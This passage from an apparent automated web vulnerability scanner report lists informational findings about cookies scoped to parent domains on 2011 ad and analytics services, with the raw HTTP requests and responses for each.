Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1aYhlCGP6Vy1ExkNK7HUtFp4B4dlWpgdiiNEFpEQNZ6MT8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8Vej6qfzVOzTItNJRFsRyXovJB740eR263MFWr1XIQIIGVb5GOMA1TQtwBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 511
Connection: keep-alive

dj.module.ad.bio.loadBizoData({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_syst
...[SNIP]...
11.9. http://ar.voicefive.com/b/recruitBeacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p104567837&PRAd=63567820&AR_C=42361216 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567813&arc=42361216&exp=1307964868; ar_p104567837=exp=1&initExp=Mon Jun 13 11:34:28 2011&recExp=Mon Jun 13 11:34:28 2011&prad=63567813&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Tue, 14 Jun 2011 00:16:20 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010580; expires=Wed 15-Jun-2011 00:16:20 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p104567837=exp=3&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:16:20 2011&prad=63567820&arc=42361216&; expires=Mon 12-Sep-2011 00:16:20 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p104567837&c3=63567820&c4=42361216&c5=&c6=3&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1308010580
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0

11.10. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036034&rn=828106784&c12=781821643-1552181814-1307987147375&c7=http%3A%2F%2Fwww.mtv.com%2Fontv%2F&c4=%2Fontv%2F&c5=20000&c8=MTV%20Original%20Shows%2C%20Reality%20TV%20Shows%20%7C%20Episode&c9=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 13 Jun 2011 17:45:52 GMT
Connection: close
Set-Cookie: UID=f68656b-184.84.69.32-1306935678; expires=Wed, 12-Jun-2013 17:45:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

11.11. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035148&d.c=gif&d.o=djglobal&d.x=252794533&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Fnews-tech-technology.html%3Frefresh%3Don HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:13:56 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 13-Jun-2013 00:13:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
11.12. http://b.voicefive.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p104567837&c3=63567820&c4=42361216&c5=&c6=2&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1308010528 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; UID=4a757a7-24.143.206.42-1305663172; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:16:55 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Thu, 13-Jun-2013 00:16:55 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
11.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2713133&PluID=0&e=0&w=300&h=250&ord=3138287&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a/i%3B239895957%3B0-0%3B0%3B15527176%3B4307-300/250%3B42522129/42539916/1%3B%3B%7Eokv%3D%3B%3Bs%3D8_10001%3Bmc%3Db2pfreezone%3Btile%3D6%3Bsz%3D336x280%2C300x250%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnu035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+afDX0000000002uK990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=le30aXzt06hH00002jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnt035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+amoJ0000000002v5a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close
Content-Length: 2180

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
11.14. http://c.microsoft.com/trans_pixel.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trans_pixel.asp?type=pv HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/products/ie/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=52319cad089b46ffaf7cb2f75a658057; domain=.microsoft.com; expires=Tue, 14-Jun-2011 01:04:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:16 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.
11.15. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=4&gen=1000&gen=100&sid=4df74dbbd76c223d&callback=_ate.ad.hrr&pub=xa-4a9728942b1daf7e&uid=4dce8a530508b02d&url=http%3A%2F%2Fchartupload.com%2F&ref=http%3A%2F%2Fwww.livewithoscar.com%2FCalendar.aspx&1o71l2i HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1306359996.1OD|1307911311.60|1307911311.1EY; dt=X; psc=1; uid=4dce8a530508b02d; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 14 Jun 2011 12:02:05 GMT
Set-Cookie: di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1307911311.60|1307911311.1EY|1306359996.1OD; Domain=.addthis.com; Expires=Thu, 13-Jun-2013 12:02:05 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 14-Jul-2011 12:02:05 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Tue, 14 Jun 2011 12:02:04 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
11.16. http://cm.mtv.overture.com/js_flat_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.mtv.overture.com
Path:   /js_flat_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_flat_1_0/?source=viacom_mtv_ctxt&outputCharEnc=latin1&ctxtUrl=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&cb=5789&config=1458724563&maxCount=3 HTTP/1.1
Host: cm.mtv.overture.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=392qmnl6tfcas&b=3&s=n2; UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwNHCwNXIycAVxhWCw0=

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:17 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwMLJ1NjMxMAM7FV5gw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Fri, 11-Jun-2021 00:18:18 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=ISO-8859-1
Content-Length: 181

zCn = "";
zRef = "";
zSr = new Array("Reach 80% of active Internet users with Yahoo!.",
"",
"",
"Ads by Yahoo!",
"http://info.yahoo.com/services/us/yahoo/ads/details.html",
"");

11.17. http://en.wordpress.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wordpress.com
Path:   /signup/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup/?ref=bottomtext HTTP/1.1
Host: en.wordpress.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 14 Jun 2011 00:31:10 GMT
Content-Type: text/html
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Set-Cookie: ref=bottomtext; path=/; domain=wordpress.com
Location: https://en.wordpress.com/signup/
Vary: Accept-Encoding
Content-Length: 0

11.18. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=13&seg=49740&action=as(133789898);as(133443903);as(133663613);&redir=http%3a%2f%2fad.yieldmanager.com%2fpixel%3fadv%3d95413%26t%3d2%26id%3d1203653%26id%3d1203654%26id%3d1203953 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3106981;type=forex803;cat=forex519;ord=1;num=1308052950?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
